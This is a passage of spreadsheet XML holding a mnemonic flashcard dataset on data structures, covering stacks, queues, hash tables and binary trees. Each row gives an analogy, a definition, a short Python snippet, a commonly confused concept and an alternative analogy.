      </c>
      <c r="B122" t="inlineStr">
        <is>
          <t>120</t>
        </is>
      </c>
      <c r="C122" t="inlineStr">
        <is>
          <t>Stack (LIFO)</t>
        </is>
      </c>
      <c r="D122" t="inlineStr">
        <is>
          <t>A spring-loaded plate dispenser in a cafeteria: you can only take the plate most recently stacked on top - the bottom plate may never see daylight.</t>
        </is>
      </c>
      <c r="E122" t="inlineStr">
        <is>
          <t>A collection where insertion and removal happen at the same end, the top: the last item pushed is the first popped.</t>
        </is>
      </c>
      <c r="F122" t="inlineStr">
        <is>
          <t>s = [] / s.append(x) # push / s.pop() # last in, first out</t>
        </is>
      </c>
      <c r="G122" t="inlineStr">
        <is>
          <t>Queue - a queue removes from the opposite end, serving the oldest item; a stack serves the newest.</t>
        </is>
      </c>
      <c r="H122" t="inlineStr">
        <is>
          <t>Pringles can (rejected: you fill it once from the factory, not push-by-push).</t>
        </is>
      </c>
      <c r="J122" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K122" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" t="n">
        <v>0</v>
      </c>
      <c r="B123" t="inlineStr">
        <is>
          <t>121</t>
        </is>
      </c>
      <c r="C123" t="inlineStr">
        <is>
          <t>Push, pop, peek</t>
        </is>
      </c>
      <c r="D123" t="inlineStr">
        <is>
          <t>A Pez dispenser: thumb a candy in (push), flip the head to take one (pop), or tilt it to peek at the next candy without eating it.</t>
        </is>
      </c>
      <c r="E123" t="inlineStr">
        <is>
          <t>Push adds to the top, pop removes and returns the top, peek reads the top without removing it - all O(1) operations.</t>
        </is>
      </c>
      <c r="F123" t="inlineStr">
        <is>
          <t>s.append(x) # push / top = s[-1] # peek / x = s.pop() # pop</t>
        </is>
      </c>
      <c r="G123" t="inlineStr">
        <is>
          <t>Pop vs peek - pop mutates the stack by removing the top; peek only inspects it and leaves the stack unchanged.</t>
        </is>
      </c>
      <c r="H123" t="inlineStr">
        <is>
          <t>Tennis-ball tube.</t>
        </is>
      </c>
      <c r="J123" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K123" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" t="n">
        <v>0</v>
      </c>
      <c r="B124" t="inlineStr">
        <is>
          <t>122</t>
        </is>
      </c>
      <c r="C124" t="inlineStr">
        <is>
          <t>Queue (FIFO)</t>
        </is>
      </c>
      <c r="D124" t="inlineStr">
        <is>
          <t>A British bus queue: newcomers join the back of the line and only the person at the front boards - cutting in is unthinkable.</t>
        </is>
      </c>
      <c r="E124" t="inlineStr">
        <is>
          <t>Items enter at the back and leave from the front, so they exit in exactly the order they arrived.</t>
        </is>
      </c>
      <c r="F124" t="inlineStr">
        <is>
          <t>from collections import deque / q = deque(); q.append(x) # enqueue at back / q.popleft() # dequeue oldest</t>
        </is>
      </c>
      <c r="G124" t="inlineStr">
        <is>
          <t>Stack - a stack serves the newest arrival; a queue serves the oldest.</t>
        </is>
      </c>
      <c r="H124" t="inlineStr">
        <is>
          <t>Drive-through window line.</t>
        </is>
      </c>
      <c r="J124" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K124" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" t="n">
        <v>0</v>
      </c>
      <c r="B125" t="inlineStr">
        <is>
          <t>123</t>
        </is>
      </c>
      <c r="C125" t="inlineStr">
        <is>
          <t>O(1) at both ends</t>
        </is>
      </c>
      <c r="D125" t="inlineStr">
        <is>
          <t>A hot-dog trailer with a door at each end: buns slide in the back door, dogs go out the front hatch - nobody inside ever shuffles forward. A Python list makes the whole line take one step each serve.</t>
        </is>
      </c>
      <c r="E125" t="inlineStr">
        <is>
          <t>A queue needs constant-time enqueue at the rear and dequeue at the front; an array-backed list makes one of those ends O(n).</t>
        </is>
      </c>
      <c r="F125" t="inlineStr">
        <is>
          <t>q.pop(0) # list: O(n), shifts everyone / dq.popleft() # deque: O(1)</t>
        </is>
      </c>
      <c r="G125" t="inlineStr">
        <is>
          <t>list.pop(0) vs deque.popleft - identical result, but the list shifts all remaining elements while the deque moves a pointer.</t>
        </is>
      </c>
      <c r="H125" t="inlineStr">
        <is>
          <t>Conveyor belt (rejected: belts move items; queues move only the ends).</t>
        </is>
      </c>
      <c r="J125" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K125" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" t="n">
        <v>0</v>
      </c>
      <c r="B126" t="inlineStr">
        <is>
          <t>124</t>
        </is>
      </c>
      <c r="C126" t="inlineStr">
        <is>
          <t>Call stack</t>
        </is>
      </c>
      <c r="D126" t="inlineStr">
        <is>
          <t>A pile of open books on your desk: each time a book cites another, you plop the new one on top; finishing it, you toss it and resume the book beneath at the exact sentence you left.</t>
        </is>
      </c>
      <c r="E126" t="inlineStr">
        <is>
          <t>The runtime stack of function frames: a call pushes a frame with locals and a return address; returning pops it and resumes the caller.</t>
        </is>
      </c>
      <c r="F126" t="inlineStr">
        <is>
          <t>def a(): b() / def b(): c() # frames: a under b under c / # c returns -&gt; pop -&gt; b resumes mid-line</t>
        </is>
      </c>
      <c r="G126" t="inlineStr">
        <is>
          <t>Heap memory - the heap holds allocations with arbitrary lifetimes; the call stack is strict LIFO frames tied to calls.</t>
        </is>
      </c>
      <c r="H126" t="inlineStr">
        <is>
          <t>Nested phone calls on hold.</t>
        </is>
      </c>
      <c r="J126" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K126" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" t="n">
        <v>0</v>
      </c>
      <c r="B127" t="inlineStr">
        <is>
          <t>125</t>
        </is>
      </c>
      <c r="C127" t="inlineStr">
        <is>
          <t>Deque (double-ended queue)</t>
        </is>
      </c>
      <c r="D127" t="inlineStr">
        <is>
          <t>A subway car with doors at both ends: passengers hop on or off at either door. Say it 'deck' - like a deck of cards you can deal from top or bottom.</t>
        </is>
      </c>
      <c r="E127" t="inlineStr">
        <is>
          <t>A queue open at both ends with O(1) push and pop at front and back - it subsumes both stack and queue.</t>
        </is>
      </c>
      <c r="F127" t="inlineStr">
        <is>
          <t>d = deque([2, 3]) / d.appendleft(1); d.append(4) / d.popleft(); d.pop()</t>
        </is>
      </c>
      <c r="G127" t="inlineStr">
        <is>
          <t>Dequeue (the verb) - 'deque' is the two-ended structure; 'dequeue' is the act of removing from a queue.</t>
        </is>
      </c>
      <c r="H127" t="inlineStr">
        <is>
          <t>Toothpaste tube open at both ends (rejected: physically wrong and gross).</t>
        </is>
      </c>
      <c r="J127" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K127" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" t="n">
        <v>0</v>
      </c>
      <c r="B128" t="inlineStr">
        <is>
          <t>126</t>
        </is>
      </c>
      <c r="C128" t="inlineStr">
        <is>
          <t>Ring buffer</t>
        </is>
      </c>
      <c r="D128" t="inlineStr">
        <is>
          <t>A sushi conveyor loop with numbered plates: the chef refills plates just behind where diners grab them, and the belt endlessly reuses the same plates.</t>
        </is>
      </c>
      <c r="E128" t="inlineStr">
        <is>
          <t>A fixed-size array with head and tail indices that wrap around modulo capacity - a queue with no shifting and no allocation.</t>
        </is>
      </c>
      <c r="F128" t="inlineStr">
        <is>
          <t>buf[tail % N] = x; tail += 1 / x = buf[head % N]; head += 1</t>
        </is>
      </c>
      <c r="G128" t="inlineStr">
        <is>
          <t>Dynamic-array queue - a ring buffer reuses fixed slots via wraparound; it never grows or shifts (full writes may overwrite oldest).</t>
        </is>
      </c>
      <c r="H128" t="inlineStr">
        <is>
          <t>Airport luggage carousel.</t>
        </is>
      </c>
      <c r="J128" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K128" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" t="n">
        <v>0</v>
      </c>
      <c r="B129" t="inlineStr">
        <is>
          <t>127</t>
        </is>
      </c>
      <c r="C129" t="inlineStr">
        <is>
          <t>Queue from two stacks</t>
        </is>
      </c>
      <c r="D129" t="inlineStr">
        <is>
          <t>Two Pringles cans: drop chips into can A; to serve, flip A upside down over can B - the oldest chip lands on top of B, ready to serve first.</t>
        </is>
      </c>
      <c r="E129" t="inlineStr">
        <is>
          <t>Push into an inbox stack; when the outbox stack is empty, pour the whole inbox into it, reversing order so pops come out FIFO.</t>
        </is>
      </c>
      <c r="F129" t="inlineStr">
        <is>
          <t>inbox.append(x) / if not outbox: / while inbox: outbox.append(inbox.pop())</t>
        </is>
      </c>
      <c r="G129" t="inlineStr">
        <is>
          <t>Stack from two queues - the mirror trick; here two LIFO reversals cancel into FIFO at amortized O(1) per operation.</t>
        </is>
      </c>
      <c r="H129" t="inlineStr">
        <is>
          <t>Hourglass flip.</t>
        </is>
      </c>
      <c r="J129" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K129" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" t="n">
        <v>0</v>
      </c>
      <c r="B130" t="inlineStr">
        <is>
          <t>128</t>
        </is>
      </c>
      <c r="C130" t="inlineStr">
        <is>
          <t>Monotonic stack</t>
        </is>
      </c>
      <c r="D130" t="inlineStr">
        <is>
          <t>A doorway line kept in decreasing height: when a taller dancer arrives, every shorter person at the door is bounced one by one - and each bounced person just met their 'next taller'.</t>
        </is>
      </c>
      <c r="E130" t="inlineStr">
        <is>
          <t>A stack kept sorted by popping smaller (or larger) tops before each push; solves next-greater-element and span problems in O(n).</t>
        </is>
      </c>
      <c r="F130" t="inlineStr">
        <is>
          <t>for i, x in enumerate(a): / while st and a[st[-1]] &lt; x: nxt[st.pop()] = x / st.append(i)</t>
        </is>
      </c>
      <c r="G130" t="inlineStr">
        <is>
          <t>Plain stack - a monotonic stack enforces an ordering invariant by evicting on push; a plain stack accepts anything on top.</t>
        </is>
      </c>
      <c r="H130" t="inlineStr">
        <is>
          <t>City skyline of strictly shrinking buildings.</t>
        </is>
      </c>
      <c r="J130" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K130" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" t="n">
        <v>0</v>
      </c>
      <c r="B131" t="inlineStr">
        <is>
          <t>129</t>
        </is>
      </c>
      <c r="C131" t="inlineStr">
        <is>
          <t>Stack overflow</t>
        </is>
      </c>
      <c r="D131" t="inlineStr">
        <is>
          <t>Stacking chairs toward the ceiling fan: each recursive call adds a chair, and the thousandth chair hits the spinning blades - RecursionError, chairs everywhere.</t>
        </is>
      </c>
      <c r="E131" t="inlineStr">
        <is>
          <t>The call stack is fixed-size; recursion too deep exhausts it and crashes - Python guards with a recursion limit near 1000.</t>
        </is>
      </c>
      <c r="F131" t="inlineStr">
        <is>
          <t>def f(): return f() / f() # RecursionError: maximum recursion depth exceeded</t>
        </is>
      </c>
      <c r="G131" t="inlineStr">
        <is>
          <t>Heap exhaustion (OOM) - the heap fails on total allocation size; the stack fails on call depth.</t>
        </is>
      </c>
      <c r="H131" t="inlineStr">
        <is>
          <t>Jenga collapse (rejected: Jenga falls from removal, overflow comes from adding).</t>
        </is>
      </c>
      <c r="J131" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K131" t="inlineStr">
        <is>
          <t>Stacks &amp; queues</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" t="n">
        <v>0</v>
      </c>
      <c r="B132" t="inlineStr">
        <is>
          <t>130</t>
        </is>
      </c>
      <c r="C132" t="inlineStr">
        <is>
          <t>Hash table (map)</t>
        </is>
      </c>
      <c r="D132" t="inlineStr">
        <is>
          <t>A coat check where the clerk grinds (hashes) your name into a number and stuffs the coat into that cubby - retrieval is one glance at cubby 47, never a search through every coat.</t>
        </is>
      </c>
      <c r="E132" t="inlineStr">
        <is>
          <t>Stores key-value pairs in an array of buckets; hashing the key picks the bucket, giving near-constant lookup, insert, and delete.</t>
        </is>
      </c>
      <c r="F132" t="inlineStr">
        <is>
          <t>d = {} / d['alice'] = 30 / d['alice'] # jump to bucket, no scan</t>
        </is>
      </c>
      <c r="G132" t="inlineStr">
        <is>
          <t>Tree map (BST) - a tree map keeps keys sorted with O(log n) ops; a hash map is unordered with O(1) average ops.</t>
        </is>
      </c>
      <c r="H132" t="inlineStr">
        <is>
          <t>Library card catalog (rejected: catalogs are sorted; hashing deliberately is not).</t>
        </is>
      </c>
      <c r="J132" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K132" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" t="n">
        <v>0</v>
      </c>
      <c r="B133" t="inlineStr">
        <is>
          <t>131</t>
        </is>
      </c>
      <c r="C133" t="inlineStr">
        <is>
          <t>Hash-to-bucket mapping</t>
        </is>
      </c>
      <c r="D133" t="inlineStr">
        <is>
          <t>A meat grinder bolted above a lazy Susan of 8 bowls: any ingredient (key) goes through the grinder into a huge number, and the wheel spins that number mod 8 to pick the bowl.</t>
        </is>
      </c>
      <c r="E133" t="inlineStr">
        <is>
          <t>bucket = hash(key) mod table_size: the hash scrambles the key into a big integer, and mod folds it into a valid array index.</t>
        </is>
      </c>
      <c r="F133" t="inlineStr">
        <is>
          <t>i = hash('alice') % 8 / buckets[i].append(('alice', 30))</t>
        </is>
      </c>
      <c r="G133" t="inlineStr">
        <is>
          <t>Cryptographic hashing - table hashing wants speed and even spread; crypto hashing wants irreversibility (different domain entirely).</t>
        </is>
      </c>
      <c r="H133" t="inlineStr">
        <is>
          <t>Roulette wheel (rejected: roulette is random; hashing is deterministic).</t>
        </is>
      </c>
      <c r="J133" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K133" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" t="n">
        <v>0</v>
      </c>
      <c r="B134" t="inlineStr">
        <is>
          <t>132</t>
        </is>
      </c>
      <c r="C134" t="inlineStr">
        <is>
          <t>Hash collision</t>
        </is>
      </c>
      <c r="D134" t="inlineStr">
        <is>
          <t>Ten pigeons, nine pigeonholes: two pigeons must share one hole, feathers flying. Two strangers' coats both hashed to cubby 47.</t>
        </is>
      </c>
      <c r="E134" t="inlineStr">
        <is>
          <t>Two different keys landing in the same bucket - inevitable by the pigeonhole principle, so every table needs a resolution strategy.</t>
        </is>
      </c>
      <c r="F134" t="inlineStr">
        <is>
          <t>hash('Aa') % 8 == hash('BB') % 8 # can collide / # both keys fight for bucket 3</t>
        </is>
      </c>
      <c r="G134" t="inlineStr">
        <is>
          <t>Hash equality vs key equality - colliding keys share a bucket but are still told apart by comparing the actual keys with ==.</t>
        </is>
      </c>
      <c r="H134" t="inlineStr">
        <is>
          <t>Two cars assigned one parking spot.</t>
        </is>
      </c>
      <c r="J134" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K134" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" t="n">
        <v>0</v>
      </c>
      <c r="B135" t="inlineStr">
        <is>
          <t>133</t>
        </is>
      </c>
      <c r="C135" t="inlineStr">
        <is>
          <t>Separate chaining</t>
        </is>
      </c>
      <c r="D135" t="inlineStr">
        <is>
          <t>Cubby 47 has a chain of hangers dangling out of it: extra coats clip onto the chain, and you flip through just the few coats on chain 47.</t>
        </is>
      </c>
      <c r="E135" t="inlineStr">
        <is>
          <t>Each bucket holds a small list of entries; colliding keys append to the bucket's chain, and lookups scan only that short chain.</t>
        </is>
      </c>
      <c r="F135" t="inlineStr">
        <is>
          <t>buckets[i] = [('Aa', 1), ('BB', 2)] / for k, v in buckets[i]: / if k == key: return v</t>
        </is>
      </c>
      <c r="G135" t="inlineStr">
        <is>
          <t>Open addressing - chaining stores collisions in per-bucket lists; open addressing stores them in other slots of the same array.</t>
        </is>
      </c>
      <c r="H135" t="inlineStr">
        <is>
          <t>Charm bracelet of key-value charms.</t>
        </is>
      </c>
      <c r="J135" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K135" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" t="n">
        <v>0</v>
      </c>
      <c r="B136" t="inlineStr">
        <is>
          <t>134</t>
        </is>
      </c>
      <c r="C136" t="inlineStr">
        <is>
          <t>Open addressing</t>
        </is>
      </c>
      <c r="D136" t="inlineStr">
        <is>
          <t>Parking: your assigned spot 47 is taken, so you creep forward - 48, 49, 50 - and take the first open spot, knowing seekers will retrace the same creep to find you.</t>
        </is>
      </c>
      <c r="E136" t="inlineStr">
        <is>
          <t>All entries live in the array itself; on collision, probe a deterministic sequence of other slots (linear, quadratic, double hash) until one is free.</t>
        </is>
      </c>
      <c r="F136" t="inlineStr">
        <is>
          <t>i = h / while table[i] is not None: i = (i + 1) % N # linear probe / table[i] = (key, val)</t>
        </is>
      </c>
      <c r="G136" t="inlineStr">
        <is>
          <t>Chaining - probing keeps everything in one flat cache-friendly array but suffers clustering; chains allocate a node per entry.</t>
        </is>
      </c>
      <c r="H136" t="inlineStr">
        <is>
          <t>Musical chairs (rejected: random seating breaks the retraceable probe path).</t>
        </is>
      </c>
      <c r="J136" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K136" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" t="n">
        <v>0</v>
      </c>
      <c r="B137" t="inlineStr">
        <is>
          <t>135</t>
        </is>
      </c>
      <c r="C137" t="inlineStr">
        <is>
          <t>Load factor and rehashing</t>
        </is>
      </c>
      <c r="D137" t="inlineStr">
        <is>
          <t>A nightclub with a strict fire marshal: at 70 percent full the club instantly moves to a hall twice the size - and every guest is re-seated by the grinder, old seat numbers void.</t>
        </is>
      </c>
      <c r="E137" t="inlineStr">
        <is>
          <t>Load factor = entries / buckets; past a threshold (~0.7) the table allocates more buckets and rehashes every key to a new position.</t>
        </is>
      </c>
      <c r="F137" t="inlineStr">
        <is>
          <t>if n / len(buckets) &gt; 0.7: / rehash_into(2 * len(buckets))</t>
        </is>
      </c>
      <c r="G137" t="inlineStr">
        <is>
          <t>Dynamic-array resize - arrays copy elements to the same indexes; hash resizing recomputes every position because the modulus changed.</t>
        </is>
      </c>
      <c r="H137" t="inlineStr">
        <is>
          <t>Bee swarm moving to a bigger hive.</t>
        </is>
      </c>
      <c r="J137" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K137" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" t="n">
        <v>0</v>
      </c>
      <c r="B138" t="inlineStr">
        <is>
          <t>136</t>
        </is>
      </c>
      <c r="C138" t="inlineStr">
        <is>
          <t>O(1) average, O(n) worst</t>
        </is>
      </c>
      <c r="D138" t="inlineStr">
        <is>
          <t>A supermarket with 20 open lanes: normally you walk right up (O(1)); the day the manager routes everyone to lane 3, you queue behind the entire store (O(n)).</t>
        </is>
      </c>
      <c r="E138" t="inlineStr">
        <is>
          <t>Good hashing touches ~1 slot per lookup on average; adversarial or degenerate hashing piles all keys into one bucket, degrading to a linear scan.</t>
        </is>
      </c>
      <c r="F138" t="inlineStr">
        <is>
          <t>d[k] # average O(1) / # all keys hash alike -&gt; one long chain -&gt; O(n) scan</t>
        </is>
      </c>
      <c r="G138" t="inlineStr">
        <is>
          <t>Amortized O(1) - amortized averages one structure's operations over time; average-case O(1) averages over how well hashes spread.</t>
        </is>
      </c>
      <c r="H138" t="inlineStr">
        <is>
          <t>Traffic jam in a single lane.</t>
        </is>
      </c>
      <c r="J138" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K138" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" t="n">
        <v>0</v>
      </c>
      <c r="B139" t="inlineStr">
        <is>
          <t>137</t>
        </is>
      </c>
      <c r="C139" t="inlineStr">
        <is>
          <t>Hash set</t>
        </is>
      </c>
      <c r="D139" t="inlineStr">
        <is>
          <t>A bouncer's guest list spread across numbered clipboards: he grinds your name to clipboard 5 and glances - you are on it or you are not; nobody's plus-one (value) is recorded.</t>
        </is>
      </c>
      <c r="E139" t="inlineStr">
        <is>
          <t>A hash table storing only keys with no values: O(1) average membership tests, add, remove, and instant deduplication.</t>
        </is>
      </c>
      <c r="F139" t="inlineStr">
        <is>
          <t>seen = set() / if x in seen: skip() / seen.add(x)</t>
        </is>
      </c>
      <c r="G139" t="inlineStr">
        <is>
          <t>Dict - a dict maps each key to a value; a set stores bare keys (CPython sets are essentially dicts without values).</t>
        </is>
      </c>
      <c r="H139" t="inlineStr">
        <is>
          <t>Stamp collection album (rejected: albums are ordered by country, sets are not).</t>
        </is>
      </c>
      <c r="J139" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K139" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" t="n">
        <v>0</v>
      </c>
      <c r="B140" t="inlineStr">
        <is>
          <t>138</t>
        </is>
      </c>
      <c r="C140" t="inlineStr">
        <is>
          <t>Hashable key contract</t>
        </is>
      </c>
      <c r="D140" t="inlineStr">
        <is>
          <t>You check your coat under your name, then legally change your name at the counter: the clerk grinds the new name to a different cubby - your coat is lost in cubby limbo forever.</t>
        </is>
      </c>
      <c r="E140" t="inlineStr">
        <is>
          <t>Keys must be hashable and stable: equal objects must hash equally, and mutating a stored key silently breaks retrieval.</t>
        </is>
      </c>
      <c r="F140" t="inlineStr">
        <is>
          <t>d[[1, 2]] = 'x' # TypeError: unhashable type / d[(1, 2)] = 'x' # immutable tuple works</t>
        </is>
      </c>
      <c r="G140" t="inlineStr">
        <is>
          <t>Equality vs identity - dict lookup uses hash then ==, never 'is'; two equal tuples find the same entry.</t>
        </is>
      </c>
      <c r="H140" t="inlineStr">
        <is>
          <t>Shape-shifter holding a locker key.</t>
        </is>
      </c>
      <c r="J140" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K140" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" t="n">
        <v>0</v>
      </c>
      <c r="B141" t="inlineStr">
        <is>
          <t>139</t>
        </is>
      </c>
      <c r="C141" t="inlineStr">
        <is>
          <t>Tombstone deletion</t>
        </is>
      </c>
      <c r="D141" t="inlineStr">
        <is>
          <t>A parking spot with a little gravestone in it: searchers read 'someone parked here once - keep creeping forward'; a truly empty spot would wrongly announce 'search over'.</t>
        </is>
      </c>
      <c r="E141" t="inlineStr">
        <is>
          <t>In open addressing, deleted slots get a tombstone marker instead of becoming empty, so probe chains passing through them stay unbroken.</t>
        </is>
      </c>
      <c r="F141" t="inlineStr">
        <is>
          <t>table[i] = TOMBSTONE # not None / # lookups skip tombstones; inserts may reuse them</t>
        </is>
      </c>
      <c r="G141" t="inlineStr">
        <is>
          <t>Chaining deletion - chains simply unlink the node; only probing schemes need tombstones to preserve lookup paths.</t>
        </is>
      </c>
      <c r="H141" t="inlineStr">
        <is>
          <t>Do-not-erase note on a whiteboard.</t>
        </is>
      </c>
      <c r="J141" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K141" t="inlineStr">
        <is>
          <t>Hash tables &amp; sets</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" t="n">
        <v>0</v>
      </c>
      <c r="B142" t="inlineStr">
        <is>
          <t>140</t>
        </is>
      </c>
      <c r="C142" t="inlineStr">
        <is>
          <t>Binary tree</t>
        </is>
      </c>
      <c r="D142" t="inlineStr">
        <is>
          <t>An upside-down tree hung like a chandelier: the root at the ceiling, every branch forking into at most two - a left twig and a right twig.</t>
        </is>
      </c>
      <c r="E142" t="inlineStr">
        <is>
          <t>A hierarchy of nodes where each node has at most two children, called left and right, growing down from a single root.</t>
        </is>
      </c>
      <c r="F142" t="inlineStr">
        <is>
          <t>class TreeNode: / def __init__(self, v): / self.val, self.left, self.right = v, None, None</t>
        </is>
      </c>
      <c r="G142" t="inlineStr">
        <is>
          <t>Binary search tree - a plain binary tree has no ordering rule; a BST adds the left &lt; node &lt; right invariant.</t>
        </is>
      </c>
      <c r="H142" t="inlineStr">
        <is>
          <t>Tournament bracket (rejected: brackets grow bottom-up toward one winner).</t>
        </is>
      </c>
      <c r="J142" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K142" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" t="n">
        <v>0</v>
      </c>
      <c r="B143" t="inlineStr">
        <is>
          <t>141</t>
        </is>
      </c>
      <c r="C143" t="inlineStr">
        <is>
          <t>Root, leaf, height, depth</t>
        </is>
      </c>
      <c r="D143" t="inlineStr">
        <is>
          <t>A cave system: the surface entrance is the root, dead-end chambers at the bottom are leaves; YOUR depth is how far you have descended, the CAVE's height is its deepest shaft.</t>
        </is>
      </c>
      <c r="E143" t="inlineStr">
        <is>
          <t>Root: the top node; leaf: a node with no children; depth: edges from root down to a node; height: edges on the longest downward path.</t>
        </is>
      </c>
      <c r="F143" t="inlineStr">
        <is>
          <t>height(leaf) == 0 / height(n) == 1 + max(height(n.left), height(n.right))</t>
        </is>
      </c>
      <c r="G143" t="inlineStr">
        <is>
          <t>Height vs depth - depth is measured from the root down to a node; height is from a node down to its deepest leaf.</t>
        </is>
      </c>
      <c r="H143" t="inlineStr">
        <is>
          <t>Corporate org chart ranks.</t>
        </is>
      </c>
      <c r="J143" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K143" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" t="n">
        <v>0</v>
      </c>
      <c r="B144" t="inlineStr">
        <is>
          <t>142</t>
        </is>
      </c>
      <c r="C144" t="inlineStr">
        <is>
          <t>BST ordering invariant</t>
        </is>
      </c>
      <c r="D144" t="inlineStr">
        <is>
          <t>A librarian at every fork of a branching library swears the oath: 'smaller titles, my whole left wing; larger titles, my whole right wing' - and every sub-librarian repeats it.</t>
        </is>
      </c>
      <c r="E144" t="inlineStr">
        <is>
          <t>For every node, all keys in its entire left subtree are smaller and all keys in its right subtree are larger - recursively, everywhere.</t>
        </is>
      </c>
      <c r="F144" t="inlineStr">
        <is>
          <t>assert all(x &lt; n.val for x in subtree(n.left)) / assert all(x &gt; n.val for x in subtree(n.right))</t>
        </is>
      </c>
      <c r="G144" t="inlineStr">
        <is>
          <t>Heap property - a heap orders only parent against child with no left-right rule; a BST orders entire subtrees around each node.</t>
        </is>
      </c>
      <c r="H144" t="inlineStr">
        <is>
          <t>Higher-lower price guessing game.</t>
        </is>
      </c>
      <c r="J144" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K144" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" t="n">
        <v>0</v>
      </c>
      <c r="B145" t="inlineStr">
        <is>
          <t>143</t>
        </is>
      </c>
      <c r="C145" t="inlineStr">
        <is>
          <t>In-order traversal</t>
        </is>
      </c>
      <c r="D145" t="inlineStr">
        <is>
          <t>Touring the branching library: read the entire left wing, then the librarian's own book, then the right wing - you exit having read all titles in perfect alphabetical order.</t>
        </is>
      </c>
      <c r="E145" t="inlineStr">
        <is>
          <t>Visit the left subtree, then the node, then the right subtree; on a BST this yields every key in ascending sorted order.</t>
        </is>
      </c>
      <c r="F145" t="inlineStr">
        <is>
          <t>def inorder(n): / if n: inorder(n.left); visit(n); inorder(n.right) / # on a BST: sorted output</t>
        </is>
      </c>
      <c r="G145" t="inlineStr">
        <is>
          <t>Pre-order - pre-order visits the node before its children (good for copying); in-order sandwiches the node between subtrees (sorted on BSTs).</t>
        </is>
      </c>
      <c r="H145" t="inlineStr">
        <is>
          <t>Playing piano keys left to right.</t>
        </is>
      </c>
      <c r="J145" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K145" t="inlineStr">
        <is>
          <t>Binary trees &amp; BSTs</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" t="n">
        <v>0</v>
      </c>
      <c r="B146" t="inlineStr">
        <is>
          <t>144</t>
        </is>
      </c>
      <c r="C146" t="inlineStr">
        <is>
          <t>Pre-order and post-order</t>
        </is>
      </c>
      <c r="D146" t="inlineStr">
        <is>
          <t>PREgame speech vs POSTgame handshake: the coach talks before the players play (pre), or the players finish before the coach wraps up (post) - and you must tear down the team before the coach, so deletion is post-order.</t>
        </is>
      </c>
      <c r="E146" t="inlineStr">
        <is>
